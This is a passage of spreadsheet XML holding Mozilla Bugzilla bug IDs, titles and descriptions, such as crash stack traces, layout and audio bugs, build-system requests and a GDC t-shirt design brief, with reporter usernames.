Bookmarks sidebar context menu items are disabled after loading bookmark on the backround from the sidebar.
Reproducible: Always
Steps to Reproduce:
1. Set browser.tabs.loadBookmarksInBackground = true so the bookmark is loaded on the backround when it's opened on new tab.
2. Open the bookmarks sidebar and open any bookmark on new tab.
3. Open the context menu for any other bookmark except for the one you just loaded.
Actual Results:  
Menu items items in the context menu are disabled and will remain disabled for all bookmarks until bookmarks sidebar loose it's focus.
On step 3 if you open the context menu for the same bookmark you loaded on step 2 menu items are not initially disabled.</t>
  </si>
  <si>
    <t>grnhornet</t>
  </si>
  <si>
    <t>CORE-298967</t>
  </si>
  <si>
    <t>Incorporate latest feedback into role and states table</t>
  </si>
  <si>
    <t>The attributes selected and checked should act like expanded in that setting
them to false is different from not having them.
checked=false means checkable no checked attribute means not checkable
selected=false means selectable no selected attribute means not selectable
Putting menuitemcheckable back in for 2 reasons:
1. to be symmetrical menuitemradio which we need
2. because both it and menuitemradio can't have a submenu (no haspopup support)</t>
  </si>
  <si>
    <t>NSS-359280</t>
  </si>
  <si>
    <t>fix typo in mozilla/security/nss/cmd/lib/SSLerrs.h</t>
  </si>
  <si>
    <t>error string for SSL_ERROR_RX_UNEXPECTED_CLIENT_KEY_EXCH contains a typo</t>
  </si>
  <si>
    <t>CORE-528566</t>
  </si>
  <si>
    <t>Resource selection algorithm not invoked on new Audio(url)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/4.3 Linux) KHTML/4.3.73 (like Gecko)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 (x86_64) de rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
If I go to https://politbuero.dyndns.org/audiotest.html I cannot hear any sound. When I UNcomment //audio.play() it works.
For some reason adding function foo() as event listeners for these events does not work. The alert(foo!) does never show.
There's no errors in the console firebug shows no problems either. I tried finding the problems for days no success. Noone in #js or #firefox could help.
Same problem on winXp/32.
Reproducible: Always</t>
  </si>
  <si>
    <t>benadler</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-455310</t>
  </si>
  <si>
    <t>Unfork Account Manager Security Preferences (am-smime.*)</t>
  </si>
  <si>
    <t>Back in 2003 the am-smime.* files were forked. The differences between these files currently appear to be:
- Thunderbird has View Certificates and Security Devices buttons (there wasn't a bug referenced for these).
- SeaMonkey has a fix for bug 272149 (misleading question when selecting multiple certificates for signing and encrypting mail)
- SeaMonkey has a fix for bug 278549 (Can't configure used certificate per mail identity) the Thunderbird equivalent is bug 252250.
Thunderbird is especially lacking bug 278549. Although the identities system isn't nice it would be good to pick up the fix for it.
Neil has said that adding the buttons to SeaMonkey are unlikely to be an issue.
I can see this being a reasonably easy two/three stage patch:
1) Port the buttons to the mailnews/ version of the files
2) Adjust TB's build system to:
a) pick up the mailnews/ version of the files remove the old ones (note there may be some accesskey/l10n property differences)
b) pick up the new files/strings from bug 278549</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-466663</t>
  </si>
  <si>
    <t>update automation/version bump script to bump js/src/config/milestone.txt</t>
  </si>
  <si>
    <t>This is a newly added file probably part of bug 97954 and neither the version bump script nor automation know anything about it. We bumped it manually for 3.1b2.</t>
  </si>
  <si>
    <t>CORE-642140</t>
  </si>
  <si>
    <t>nsEventDispatcher should dispatch chrome only events to TabChildGlobal</t>
  </si>
  <si>
    <t>Created attachment 519674
patch
With this change using NS_EVENT_FLAG_ONLY_CHROME_DISPATCH does the right thing
IMO which is that the event is also dispatched to tabglobal.
We could even add a helper method to nsIPrivateDOMEvent to set that flag
if needed.
Will upload to tryserver</t>
  </si>
  <si>
    <t>NSS-62902</t>
  </si>
  <si>
    <t>cosmetics for QA report</t>
  </si>
  <si>
    <t>fix header for 1st table (all same font)
spacing between tables
header for tables
hyperlink to errors in N6
column testnumber in perftable at the end QA Time / number
QA-OS in perftable</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-302501</t>
  </si>
  <si>
    <t>constructor property shouldn't be readonly</t>
  </si>
  <si>
    <t>Test case:
function f() { }
function g() { }
f.prototype.constructor = g
print(f.prototype.constructor == g)
Should print true.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-296783</t>
  </si>
  <si>
    <t>[adblocking] images not loading / missing content / distorted layout when Block web advertising enabled</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050529 Camino/0.8+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050529 Camino/0.8+
In the GIF previews of these papers the images do not appear in the left hand
frame or the lower right frame.  They appear in both Firefox and Safari.  Maybe
the image location is not being interpreted correctly?
Reproducible: Always
Steps to Reproduce:
1. Load the page and see for yourself
2.
3.
Actual Results:  
No images
Expected Results:  
Safari or Firefox</t>
  </si>
  <si>
    <t>jwise77</t>
  </si>
  <si>
    <t>BUGZILLA-305498</t>
  </si>
  <si>
    <t>UTF-8 e-mail encoding is not working</t>
  </si>
  <si>
    <t>When the UTF-8 option is enabled and the text of the e-mail contains 8bit 
caracters the e-mail is not corectly formated and the non ascii catacters are 
displayed as =XX whwre XX is an hex number.
this is a litle sample:
dans le reports fournisseurs coordonn=C3=A9es d=C3=A9taill=C3=A9es de l'= 
agent : les 
commentaires ne s'affichent pas sur le document d'impression.</t>
  </si>
  <si>
    <t>JSS-100783</t>
  </si>
  <si>
    <t>JSS 3.1.1 should use NSS 3.3.1</t>
  </si>
  <si>
    <t>CORE-386690</t>
  </si>
  <si>
    <t>Negative width attribute and percentage height on  causes ASSERTION: reflow state made child wrong size and more</t>
  </si>
  <si>
    <t>Created attachment 270686
testcase
This is similar to bug 385246 (which is fixed).  The difference seems to be that the height attribute is a percentage height.
###!!! ASSERTION: reflow state made child wrong size: 'reflowState.ComputedWidth() == size.width' file /Users/jruderman/trunk/mozilla/layout/svg/base/src/nsSVGForeignObjectFrame.cpp line 609
###!!! ASSERTION: unexpected size: 'size.width == desiredSize.width &amp;&amp; size.height == desiredSize.height' file /Users/jruderman/trunk/mozilla/layout/svg/base/src/nsSVGForeignObjectFrame.cpp line 615</t>
  </si>
  <si>
    <t>CORE-53142</t>
  </si>
  <si>
    <t>UMR in call to IsSupportedHandler from nsXBLBinding::InstallEventHandlers</t>
  </si>
  <si>
    <t>Purify doesn't like the fact that iid can be uninitialized in 
nsXBLBinding::InstallEventHandlers when the call is made to IsSupportedHandler
http://lxr.mozilla.org/seamonkey/source/layout/xbl/src/nsXBLBinding.cpp#672</t>
  </si>
  <si>
    <t>CORE-285691</t>
  </si>
  <si>
    <t>crash logging in to gmail [@ nsQueryInterface::operator()]</t>
  </si>
  <si>
    <t>20050310 trunk build (20050309 trunk build does not crash):
Go to gmail.google.com
Fill in name &amp; password
hit return
Keep trying. There's a good chance it'll crash. Reduced testcase coming up.
Stack trace:
nsQueryInterface::operator()
nsCOMPtr_base::assign_from_qi
nsCOMPtr::operator=
XPCWrappedNative::GetNewOrUsed (see note below)*
XPCConvert::NativeInterface2JSObject
nsXPConnect::WrapNative
nsJSEventListener::HandleEvent
nsEventListenerManager::HandleEventSubType
nsEventListenerManager::HandleEvent
nsGenericElement::HandleDOMEvent
nsHTMLFormElement::HandleDOMEvent
PresShell::HandleDOMEventWithTarget (form submit)
nsHTMLInputElement::HandleDOMEvent
PresShell::HandleDOMEventWithTarget (mouseclick)
nsHTMLInputElement::MaybeSubmitForm
nsHTMLInputElement::HandleDOMEvent (keypress)
PresShell::HandleEventInternal
PresShell::HandleEvent
nsViewManager::HandleEvent
nsViewManager::DispatchEvent
HandleEvent
nsWindow::DispatchEvent
nsWindow::DispatchWindowEvent (keypress)
nsWindow::DispatchKeyEvent
nsWindow::OnKeyDown
nsWindow::ProcessMessage
* at GetNewOrUsed line 229:
        identity = do_QueryInterface(Object)
Object points to some deleted thing.
Similar to bug 285579? The stack traces are different.
I've set the component and cc:s from a guess after looking at the 20050310
checkins. It seems like the checkin for bug 285404 would be the cause. I haven't
verified that.</t>
  </si>
  <si>
    <t>CORE-67699</t>
  </si>
  <si>
    <t>xpcom needs nsIClassInfo accessible from object instances</t>
  </si>
  <si>
    <t>xpconnect interface flattening (bug 13422) requires a scheme for asking any 
given object for info about its class. I intend this to be an interface on the 
object's class object. More to come...</t>
  </si>
  <si>
    <t>FIREFOX-355738</t>
  </si>
  <si>
    <t>meta bug:  re-implement all the existing history UI on top of the Places backend</t>
  </si>
  <si>
    <t>meta bug:  re-implement all the existing history UI on top of the Places backend
individual bugs (with SWAG) to follow.</t>
  </si>
  <si>
    <t>CORE-103777</t>
  </si>
  <si>
    <t>crashes Trunk  [@ nsFontMetricsWin::ResolveForwards][@ nsFontMetricsWinA::ResolveForwards]</t>
  </si>
  <si>
    <t>Crashes at nsFontMetricsWinA::ResolveForwards (on Windows 95) and in
nsFontMetricsWinA::ResolveForwards (on Windows 98 and Windows NT 5.0) seemed to
start around the time of the font landing (9/27).  Looking at the disassembly in
the talkback both cases seem like the nsFontWin* retrieved from mLoadedFonts
was null.  (The crashes are on line 3289 and line 4762.)
Example stacks are (note that the line numbers point to line-after):
nsFontMetricsWinA::ResolveForwards
[d:\builds\seamonkey\mozilla\gfx\src\windows\nsFontMetricsWin.cpp line 4764]
nsRenderingContextWin::GetTextDimensions
[d:\builds\seamonkey\mozilla\gfx\src\windows\nsRenderingContextWin.cpp line 2197]
nsTextFrame::ComputeWordFragmentDimensions
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsTextFrame.cpp line 5538]
nsTextFrame::ComputeTotalWordDimensions
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsTextFrame.cpp line 5379]
nsTextFrame::MeasureText
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsTextFrame.cpp line 4868]
nsTextFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsTextFrame.cpp line 5125] 
or
nsFontMetricsWin::ResolveForwards
[d:\builds\seamonkey\mozilla\gfx\src\windows\nsFontMetricsWin.cpp line 3291]
nsRenderingContextWin::GetTextDimensions
[d:\builds\seamonkey\mozilla\gfx\src\windows\nsRenderingContextWin.cpp line 2197]
nsTextFrame::MeasureText
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsTextFrame.cpp line 4602]
nsTextFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsTextFrame.cpp line 5125]</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-230340</t>
  </si>
  <si>
    <t>support dragging multiple items in history view</t>
  </si>
  <si>
    <t>this is a follow on to bug 227618. Dragging multiple items in the history
outline view should be supported.</t>
  </si>
  <si>
    <t>JSS-162767</t>
  </si>
  <si>
    <t>remove keygen alg translation code when using NSS 3.6 or later</t>
  </si>
  <si>
    <t>Now that bug 162761 has been fixed we can remove the keygen algorithm
translation switch statement in PK11KeyGenerator.generateNormal in
PK11KeyGenerator.c. But we have to wait until we use a version of NSS that has
the fix which looks like NSS 3.6 or later.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-512597</t>
  </si>
  <si>
    <t>[AMO] setup dev/staging instance of phpbb</t>
  </si>
  <si>
    <t>As part of the new Add-on Developer Hub site we'd like to set up forums for discussion of a wide range of add-on topics.
We would like for this to be hosted on forums.addons.mozilla.org and separated from AMO's database and webroot so that any security issues with the forum software won't affect AMO. Note that this domain does not need to be EV SSL only SSL.
We're looking for IT's input on open source forum systems but so far the best looking candidate seems to be phpbb.
Webdev will be writing plug-ins and themes for any account integration changes we'd need to make.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-506743</t>
  </si>
  <si>
    <t>Update GS links on Mozilla Messaging site</t>
  </si>
  <si>
    <t>Point links on Support main page and Get Involved to the GS Mozilla Messaging account: 
http://www.getsatisfaction.com/mozilla_messaging</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-333018</t>
  </si>
  <si>
    <t>Command Line Support</t>
  </si>
  <si>
    <t xml:space="preserve">we need a way to do something like:
minimo.exe </t>
  </si>
  <si>
    <t>CORE-260318</t>
  </si>
  <si>
    <t>UMR in nsScanner::AppendToBuffer</t>
  </si>
  <si>
    <t>the field mFirstNonWhitespacePosition from bug 178088 is used uninitialized in
AppendBuffer when called from the first nsScanner constructor.  it is
initialized in the constructor but only after the call to AppendBuffer.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-363538</t>
  </si>
  <si>
    <t>Newsgroup links should be updated</t>
  </si>
  <si>
    <t xml:space="preserve">The newsgroup links refer old newsgroups.  Those should be updated.
--- mozilla-org/html/projects/plugins/index.html
+++ mozilla-org/html/projects/plugins/index.html
@@ -1108 +1108 @@
 plugins in ActiveX control containers such as Internet Explorer.
    Newsgroup: 
-   netscape.public.mozilla.plugins
-   E-mail gateway: mozilla-plugins@mozilla.org (subscribe | unsubscribe)
+   mozilla.dev.tech.plugins
+   E-mail gateway: dev-tech-plugins@lists.mozilla.org (subscribe/unsubscribe)
 </t>
  </si>
  <si>
    <t>kazssym</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-302984</t>
  </si>
  <si>
    <t>Doxygen wiki extension</t>
  </si>
  <si>
    <t>We need a  wiki extension -- you requested I file this on you.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-500741</t>
  </si>
  <si>
    <t>modifying the database needs to be done via POST</t>
  </si>
  <si>
    <t>/tags/add_ajax/ needs to add tags from POST not GET.  This is blocking any UTF-8 tags from being added right now.  Same with blacklisting and any other code that writes to the db.
Our regex filter in bootstrap is going to cause trouble for us when we want to do stuff like preview.addons.mozilla.org/en-US/firefox/tag/ä¸‹è¼‰ but we'll deal with that when we get there.  Any create/update/deletes should be done via POST for security reasons (using the anti-CSRF code.  This is mostly automatic - just look at the other forms for an example).</t>
  </si>
  <si>
    <t>markwunsch</t>
  </si>
  <si>
    <t>NSS-74009</t>
  </si>
  <si>
    <t>QA needs to recognize existance of a lock file</t>
  </si>
  <si>
    <t>/tmp/Pk12uTmp - lock file gets created by pk12util but no appropriate
errormessage if it exists just failure at pk12util -i
problem was - jordan all of a sudden started failing the pk12util tests - the
failure actually was that the lock file existed and was rw only by Bob
see bug #70765</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-454947</t>
  </si>
  <si>
    <t>Tinderbox qm-win2k3-moz2-01 is red</t>
  </si>
  <si>
    <t>Looks like some process(es) needs to be manually killed. Tinderbox log:
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1221184435.1221184439.23615.gz&amp;fulltext=1
[Error 13] The process cannot access the file because it is being used by another process: 'D:\\builds\\slave\\trunk_win2k3i-01\\build\\netwerk\\test\\httpserver\\httpd.js</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-123285</t>
  </si>
  <si>
    <t>Columns aren't correctly persisted in History</t>
  </si>
  <si>
    <t>patch coming up.</t>
  </si>
  <si>
    <t>BUGZILLA-179177</t>
  </si>
  <si>
    <t>keywords and dependencies tables aren't locked when creating bug</t>
  </si>
  <si>
    <t>keywords and dependencies can be added to a new bug but those tables aren't
locked beforehand although this is necessary to prevent a server error if an
installation is using the shadow database.
the fielddefs table also has to be locked as it's used by the dependency
insertion code.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-210781</t>
  </si>
  <si>
    <t>Radio Wimbledon has bad browser sniffer</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/20030529
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/200306024
When one attempts to play Radio Wimbledon you are redirected to a site that
claims that mozilla does not meet the requirements to play Radio Wimbledon.
Reproducible: Always
Steps to Reproduce:
1.Click Launch Radio Wimbledon.
2.Scratch head.
3.
Actual Results:  
Mozilla is redirected to a page that claims mozilla cannot play Radio wimbledon
due to not meeting browser requirements.
Expected Results:  
Mozilla should open a window that should play the Real audio stream.</t>
  </si>
  <si>
    <t>augsburs</t>
  </si>
  <si>
    <t>MARKETING-979144</t>
  </si>
  <si>
    <t>GDC 2014 Team Shirts</t>
  </si>
  <si>
    <t>&gt;&gt;Project/Request Title:
GDC 2014 Team Shirts
&gt;&gt;Project Overview:
Mozilla has participated in previous editions of the Game Developers Conference (GDC) and this year's event will prove to be a larger more prominent stage for Firefox games than any other edition of years prior. There are several major announcements with new partners that will be of great significance to the industry as well as potential new business relationships. 
One of the aspects of Mozilla's presence at GDC this year includes a booth twice the size of our booth last year. While still a small booth in relation to some of our show floor neighbors (we will be down the row from Google) this is an opportunity for our staff to make a noticeable impact among attendees. We will be running demonstrations and presentations at the Mozilla and Mozilla's partners' booths and it is important to have a unifying appearance clearly identifying the Mozilla team wherever they are across the venue while we discuss how far Mozilla games have come and will be going during the next year.
&gt;&gt;Creative Specs &amp; Deliverables:
Deliverable:
1 t-shirt design 
Simple versatile (not necessarily GDC 2014 specific) impactful includes the text Firefox Games Team.
Some ideas include having Firefox Games Team across the front and the HTML5 knight (from last year) on the back or the Firefox logo on the front and Firefox Games Team on the back. Black t-shirt with white text may be the way to keep the look polished but casual while making a visual impact but open to interpretation and suggestion.
&gt;&gt;Launch Date:
2014-03-18
&gt;&gt;Creative Due Date:
2014-03-11
&gt;&gt;Mozilla Goal:
Firefox Deskop
&gt;&gt;Points of Contact:
rchau@mozilla.com</t>
  </si>
  <si>
    <t>mternoway</t>
  </si>
  <si>
    <t>rchau</t>
  </si>
  <si>
    <t>TESTING-508457</t>
  </si>
  <si>
    <t>imap fake server doesn't adjust highwater mark when messages added</t>
  </si>
  <si>
    <t>Created attachment 392636
proposed fix
If I copy a message into a folder w/ fake server it doesn't adjust __highestuid which makes fetch 1:* not return the right set of messages.
With this patch imap undo works with fakeserver so I shouldn't have to pester you for any more reviews :-)</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-98820</t>
  </si>
  <si>
    <t>lycos.com - Popup not working</t>
  </si>
  <si>
    <t>When using the Insert Address feature on the Lycos webmail I am running into a
problem. The popup with the address loads fine and you can select which address
you want without problem. However when I click the Insert buuton the popup
blanks and does not go away like it normally does. It does not insert the
address either.
This page worke fine with IE 5.5 and Netscape 4.78.</t>
  </si>
  <si>
    <t>iollan</t>
  </si>
  <si>
    <t>CORE-285036</t>
  </si>
  <si>
    <t>Fix layout testcase issues</t>
  </si>
  <si>
    <t>There are some issues in the layout testcases:
1) Some of the net testcase URLs are currently redirected to other places. It
simplifies things for me if the true URLs are in the rtest file so I've updated
those URLs.
2) 3 URLs get escaped by Gecko and that confuses my code. I've just removed them.
3) A few of the W3C tests are missing from the W3C site. I've removed them.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-393848</t>
  </si>
  <si>
    <t>Need better error message for methods that exceed 64K</t>
  </si>
  <si>
    <t>From newsgroup:
Using Rhino to compile a big JS script to .class file at the run time I've got below exception.
Someone said that it occurs when a too big javascript file is given to Rhino.
Any solution?
rhino-run:
     [java] Exception in thread main java.lang.ClassFormatError: Invalid method Code length 83259 in class file com/sun/lzplayer/Precompiled_JS_Runtime
     [java]     at java.lang.ClassLoader.defineClass1(Native Method)
     [java]     at java.lang.ClassLoader.defineClass(ClassLoader.java:620)
     [java]     at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:124)
     [java]     at java.net.URLClassLoader.defineClass(URLClassLoader.java:260)
     [java]     at java.net.URLClassLoader.access$100(URLClassLoader.java:56)
     [java]     at java.net.URLClassLoader$1.run(URLClassLoader.java:195)
     [java]     at java.security.AccessController.doPrivileged(Native Method)
     [java]     at java.net.URLClassLoader.findClass(URLClassLoader.java:188)
     [java]     at java.lang.ClassLoader.loadClass(ClassLoader.java:306)
     [java]     at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:268)
     [java]     at java.lang.ClassLoader.loadClass(ClassLoader.java:251)
     [java]     at java.lang.ClassLoader.loadClassInternal(ClassLoader.java:319)
     [java]     at java.lang.Class.forName0(Native Method)
     [java]     at java.lang.Class.forName(Class.java:164)
     [java]     at org.mozilla.javascript.tools.shell.Global.getClass(Global.java:296)
     [java]     at org.mozilla.javascript.tools.shell.Global.loadClass(Global.java:273)
     [java]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
     [java]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
     [java]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
     [java]     at java.lang.reflect.Method.invoke(Method.java:585)
     [java]     at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:145)
     [java]     at org.mozilla.javascript.FunctionObject.call(FunctionObject.java:408)
     [java]     at org.mozilla.javascript.optimizer.OptRuntime.callName(OptRuntime.java:97)
     [java]     at org.mozilla.javascript.gen.c1._c0(/home/openlaszlo/orbit/build/gen/run.js:2)
     [java]     at org.mozilla.javascript.gen.c1.call(/home/openlaszlo/orbit/build/gen/run.js)
     [java]     at org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:340)
     [java]     at org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:2758)
     [java]     at org.mozilla.javascript.gen.c1.call(/home/openlaszlo/orbit/build/gen/run.js)
     [java]     at org.mozilla.javascript.gen.c1.exec(/home/openlaszlo/orbit/build/gen/run.js)
     [java]     at org.mozilla.javascript.tools.shell.Main.evaluateScript(Main.java:503)
     [java]     at org.mozilla.javascript.tools.shell.Main.processFileSecure(Main.java:425)
     [java]     at org.mozilla.javascript.tools.shell.Main.processFile(Main.java:391)
     [java]     at org.mozilla.javascript.tools.shell.Main.processSource(Main.java:382)
     [java]     at org.mozilla.javascript.tools.shell.Main.processFiles(Main.java:179)
     [java]     at org.mozilla.javascript.tools.shell.Main$IProxy.run(Main.java:100)
     [java]     at org.mozilla.javascript.Context.call(Context.java:528)
     [java]     at org.mozilla.javascript.ContextFactory.call(ContextFactory.java:450)
     [java]     at org.mozilla.javascript.tools.shell.Main.exec(Main.java:162)
     [java]     at org.mozilla.javascript.tools.shell.Main.main(Main.java:140)
     [java] Java Result: 1
Thank you in advance
Hyok 
--------------
Need a better error message for this case.</t>
  </si>
  <si>
    <t>CALENDAR-189330</t>
  </si>
  <si>
    <t>All-day events scheduled in April 2003 appear off by one day in calendar.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
Summary says it all. See steps to reproduce.
Reproducible: Always
Steps to Reproduce:
1. Right click on Monday April *21* 2003.
2. Select New Event.
3. Enter Holiday as title.
4. Check box next to This event lasts all day.
5. Select OK.
6. Notice that event appears in the calendar on April *20* 2003.
7. Double click on the event shown on April *20* 2003.
8. Notice the start and end date of the event are shown as April *21* 2003.
Actual Results:  
All-day events in April 2003 aren't displayed on the correct days on the April
2003 month view. Specifically they are displayed one day prior to their
scheduled day.
Expected Results:  
Correctly display all-day events in April 2003.</t>
  </si>
  <si>
    <t>TOOLKIT-328742</t>
  </si>
  <si>
    <t>MAR files (update.manifest) cannot be reliably recreated exactly</t>
  </si>
  <si>
    <t>I'm investigating creating my own versions of MAR files and I found a 15 byte difference in my update.manifest file.
The difference was that the order of files used in the release manifest seemed completely random (although it was 15 bytes smaller than mine)
I don't think this random order was done deliberately to save 15 bytes - I believe it was file system dependent.
In order to ensure that the MAR files can be recreated reliably we should sort the results:
find . -type f ! -name channel-prefs.js ! -name update.manifest | sed 's/\.\/\(.*\)/\1/' | sort</t>
  </si>
  <si>
    <t>SEAMONKEY-68082</t>
  </si>
  <si>
    <t>Statusbar messages are too big</t>
  </si>
  <si>
    <t>Statusbar messages are too big and displayed over taskbar.
Linux build: 2001020608</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-375255</t>
  </si>
  <si>
    <t>Localization fall-back broken (empty strings displayed instead)</t>
  </si>
  <si>
    <t>This might be bug 370595 not being fixed or a new issue:
I've just updated the description to Crash Recovery (which suddenly contained HTML entities which I've never entered in the first place) and although I haven't entered anything for any language except English the empty translated strings seem to be used:
https://addons.mozilla.org/de/firefox/addon/1955
This also leads to the extension not being listed at all in the list of an author's extensions:
https://addons.mozilla.org/de/firefox/user/9225
And I guess that this same issue is also responsible for a lot of title-less extensions in the categories list:
https://addons.mozilla.org/de/firefox/browse/type:1/cat:4</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-305520</t>
  </si>
  <si>
    <t>GtkPromptService invalid warning on ConfirmEx with &lt; 3 buttons</t>
  </si>
  <si>
    <t>Steps to reproduce:
0) run TestGtkEmbed
1) Go to http://foo@gnome.org/
Results:
WARNING: Unexpected button flags file
/opt/source/mozilla/1.8-ff/mozilla/embedding/browser/gtk/src/GtkPromptService.cpp
line 346
The 'unexpected' flag is 0. This happens when determining the label of the 3rd
button and flags is 0 because there are only 2. nsIPromptService.idl for
ConfirmEx says Puts up a dialog with up to 3 buttons and an optional labeled
checkbox. so this is NOT unexpected. Simple fix coming up.</t>
  </si>
  <si>
    <t>FIREFOX-473299</t>
  </si>
  <si>
    <t>_someone_ forgot to rev the UUID when changing an interface</t>
  </si>
  <si>
    <t>...and someone _else_ didn't catch it on review!
jerks.</t>
  </si>
  <si>
    <t>FIREFOX-249735</t>
  </si>
  <si>
    <t>F6 goes to the first focusable element instead of the address bar (does not focus on location bar)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040627 Firefox/0.9.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040627 Firefox/0.9.0+
When you put the search bar object in the toolbar and press f6 the normal
behaviour is broken and the focus will switch between the page and the search
bar object
Reproducible: Always
Steps to Reproduce:
1.put the search bar in the toolbar
2.switch focus with f6
Actual Results:  
focus between page and search bar
Expected Results:  
focus between page and location bar</t>
  </si>
  <si>
    <t>nirvn.asia</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-727270</t>
  </si>
  <si>
    <t>Request for a license to OmniGraffle and OmniPlan</t>
  </si>
  <si>
    <t>I'd like to be able to create hi-res mock-ups and better plan the features we're trying to do on a quarterly basis. I've tried out the trial periods for both OmniPlan and OmniGraffle and it'd be great to be able to use them going forward. 
Can I get a license for these apps?</t>
  </si>
  <si>
    <t>aignacio</t>
  </si>
  <si>
    <t>mozaakash</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-845050</t>
  </si>
  <si>
    <t>FileCopier support for symlinks</t>
  </si>
  <si>
    <t>The FileCopier code in mozpack is pretty useful! We're looking at using it as part of the build system for tasks like installing IDLs and header files into the dist directory.
It would be handy if FileCopier or some variant (possibly a new BaseFile class) supported symlinks (where available) instead of raw file copy. This should lead to some performance wins due to reduced I/O as part of building.
I don't think this is required for any build system work just yet. It will be nice to plug in if and when it is available.</t>
  </si>
  <si>
    <t>SEAMONKEY-246839</t>
  </si>
  <si>
    <t>javascript-progress-bar isn't displayed properly like with Mozialla-1.5</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040608
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040608
With mozilla 1.5 the red progress bar was visible and appeard like it should.
With Mozilla 1.7/RC3 it only flickers a short time red and then does nothing
(visible)
Reproducible: Always
Steps to Reproduce:
1. Goto http://www.24fun.com/downloadcenter/benchjs/benchjs.html
2. Click on the start javascript speed test button.
3. In the first test you should see an animated red progressbar but with RC3 it
alsways stays gray although you can see the script counts up in the statusbar.
Actual Results:  
The gray/red progressbar stays always gray.
It worked with Mozilla-1.5
Expected Results:  
It should display the progress and get more and more red</t>
  </si>
  <si>
    <t>reactos</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-261241</t>
  </si>
  <si>
    <t>remove *WithConversion from mac embedding code</t>
  </si>
  <si>
    <t>uris are utf-8.</t>
  </si>
  <si>
    <t>CORE-462042</t>
  </si>
  <si>
    <t>TM: Allow GC with traced machine code on stack</t>
  </si>
  <si>
    <t>If we allow reentering the VM as discussed in bug 462027 we need to cope with stacks like
js_Interpret -&gt; js_ExecuteTree -&gt; (traced code) -&gt; Array_p_join -&gt; js_ValueToString -&gt; js_Invoke -&gt; js_Interpret -&gt; ... -&gt; js_GC
Currently this will do js_GC -&gt; js_FlushJITCache -&gt; Fragmento::clearFrags which would free the traced code.  We will eventually return to that code so we need to keep it around or something.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-507233</t>
  </si>
  <si>
    <t>cruncher.build.m.o not accessible by talos-staging-master</t>
  </si>
  <si>
    <t>Want to be able to ssh/scp between these machines and in future between cruncher and all build masters.  Can we open up a hole here so that that is possible?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-120661</t>
  </si>
  <si>
    <t>labrescue.org - text draws on top of itself</t>
  </si>
  <si>
    <t>This is probably a floater bug so it's probably a dup. Filing it anyway. Look
about half-way down the page. It's a mess.</t>
  </si>
  <si>
    <t>CORE-351614</t>
  </si>
  <si>
    <t>strcpy used instead of strncpy</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-372904</t>
  </si>
  <si>
    <t>[fi] migration wizard string change</t>
  </si>
  <si>
    <t>We want to change the description of the homepage in the migration wizard
http://lxr.mozilla.org/l10n-mozilla1.8/source/fi/other-licenses/branding/firefox/brand.properties
It should look like http://lxr.mozilla.org/mozilla/source/other-licenses/branding/firefox/locales/en-US/brand.properties
